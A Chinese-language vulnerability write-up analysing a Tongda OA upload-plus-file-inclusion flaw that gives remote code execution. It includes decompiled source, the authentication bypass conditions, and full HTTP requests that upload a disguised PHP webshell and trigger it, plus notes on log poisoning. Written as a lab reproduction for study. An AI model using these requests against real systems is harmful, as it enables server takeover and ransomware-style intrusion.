0x01 漏洞说明
通达OA是由北京通达信科科技有限公司研发的一套通用型OA产品。而近日,通达OA在官方论坛发布了紧急通知,提供了针对部分用户反馈遭受勒索病毒攻击的安全加固程序。
通过在 v11.3 版本的测试发现全版本的文件上传结合 v11 版本的文件包含漏洞可以造成远程命令执行,且默认为 System 权限。攻击者可成功上传 webshell 控制服务器。
官网最新的 v11.4 版本应该是修复版本。
0x02 影响版本
V11版
2017版
2016版
2015版
2013版
2013增强版
版本不同路径不同
2013:
文件上传路径:/ispirit/im/upload.php
文件包含路径:/ispirit/interface/gateway.php
2017:
文件上传路径:/ispirit/im/upload.php
文件包含路径:/mac/gateway.php
这里具体的验证下来我发现,有些版本两个文件包含的路径都不存在,不知道具体的情况是什么样的。
0x03 源码分析
本着学习的态度,跟着网上的一些文章进行代码审计
分析版本:v11.3
1. 文件包含:ispirit/interface/gateway.php
代码经过了加密,采用的是 zend ,网上有在线解密工具 http://dezend.qiling.org/free/
$val) {
if ($key == 'data') {
$val = (array) $val;
foreach ($val as $keys => $value) {
${$keys} = $value;
}
}
if ($key == 'url') {
$url = $val;
}
}
if ($url != '') {
if (substr($url, 0, 1) == '/') {
$url = substr($url, 1);
}
if (strpos($url, 'general/') !== false || strpos($url, 'ispirit/') !== false || strpos($url, 'module/') !== false) {
include_once $url;
}
}
exit;
}
最开始的代码里,可以看到,如果 $P 不为空,则对 SESSION 进行登陆验证。
但是此处如果 $P 未空的情况下,可直接绕过身份认证继续执行下面的代码程序。
strpos() 函数,查找字符串在另一个字符串第一次出现的位置;!== 表示不全等。
这里简单来讲 $url 的值里需要有 general/ ispirit/ module/ 中的一个就可进入条件,触发包含。
回头看 $url 是如何来的,首先通过 stripcslashes() 函数删除字符串中的反斜杠,
然后将字符串转化为数组,通过 foreach 遍历数组,将键为 url 的值赋给 $url。
总结:
$P为空可绕过身份验证$json的数据中,需要有url这个键,且其值需要包含general/ispirit/module/中的一个利用:包含日志、远程文件包含(通过SMB或者webdav进行bypass)、包含上传文件
可通过
../来跨目录
2. 文件上传:ispirit/im/upload.php
全部源码太长就不贴了。
$P 接受POST传递过来值,当 P 传的值为空,则进入 auth.php 进行登陆认证。而 P 不为空时,可以绕过登陆认证。
判断 $DEST_UID 是否为空;其次如果 DEST_UID 中存在有 , 则通过 intval() 获取整数值;最后当 $DEST_UID=0 时,UPLOAD_MODE 要为2,否则接收方ID无效。
跟进 upload() 函数 inc/utility_file.php ,有一个 is_uploadable() 函数进行后缀校验
通过 strrpos() 函数获取 $FILE_NAME 最后一个 . 后的三个字符串且不能为 php 的文件。如果想绕过这个函数可以采用 1.php. 的形式。这里由于不在web目录下,所以不用纠结,需要配合包含解析。
总结:
POST传入的
P非空DEST_UID不为空UPLOAD_MODE可以为1,2,3,DEST_UID但为0时,UPLOAD_MODE必须为2file的
name需设置成ATTACHMENT
0x03 漏洞复现
安装配置
这里下载的是 v11.3 版本
安装过程需要配置一下端口
默认的登陆账号密码:
admin : null
文件上传
Title
TDOA upload test
POST /ispirit/im/upload.php HTTP/1.1
Host: 192.168.109.141:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/test/up.html
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------156322138920312
Content-Length: 680
-----------------------------156322138920312
Content-Disposition: form-data; name="P"
123
-----------------------------156322138920312
Content-Disposition: form-data; name="DEST_UID"
4
-----------------------------156322138920312
Content-Disposition: form-data; name="UPLOAD_MODE"
1
-----------------------------156322138920312
Content-Disposition: form-data; name="ATTACHMENT"; filename="1.jpg"
Content-Type: image/jpeg
exec("cmd /c ".$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>
-----------------------------156322138920312--
HTTP/1.1 200 OK
Server: nginx
Date: Wed, 25 Mar 2020 01:38:23 GMT
Content-Type: text/html; charset=gbk
Connection: close
Vary: Accept-Encoding
Set-Cookie: PHPSESSID=123; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Frame-Options: SAMEORIGIN
Content-Length: 74
{"status":1,"content":"[vm]252@2003_1752128412|1.jpg|0[\/vm]","file_id":1}
注意的是:通达OA默认配置了 disable_functions ;windows情况下可通过加载 COM 组件bypass
上传成功后的banner,上传文件在 /attach/im/2003/ 里面 ,这是一个非web目录,无法直接解析。
文件包含
1、配合文件上传包含
包含刚刚上传的文件
POST /ispirit/interface/gateway.php HTTP/1.1
Host: 192.168.109.141:8000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
json={"url":"/general/../../attach/im/2003/1752128412.1.jpg"}&cmd=ipconfig
也可以通过包含写入马在当前目录下生成一个 readme.php 文件,来getshell
冰蝎链接,密码 pass
2、包含 nginx 日志
通常的利用思路:
通过文件包含,枚举得到 nginx 的配置文件,可以得到nginx错误日志的路径,和可以看到访问日志
通过抓取数据包写入恶意代码,这里踩到一个坑,开始我使用了双引号,日志文件转义了,导致包含爆500的错。也可以采用base64的方法
通过包含漏洞成功解析
有包含,能跨目录,可以尝试配合中间件各种日志等来包含。
参考文献
[通达OA RCE + Getshell] https://www.cnblogs.com/yuyan-sec/p/12549237.html
[通达OA任意文件上传和文件包含漏洞导致RCE详细代码审计分析及Poc构造复现] https://www.freebuf.com/column/230871.html
[利用nginx日志结合本地包含漏洞GetShell] https://segmentfault.com/a/1190000009809346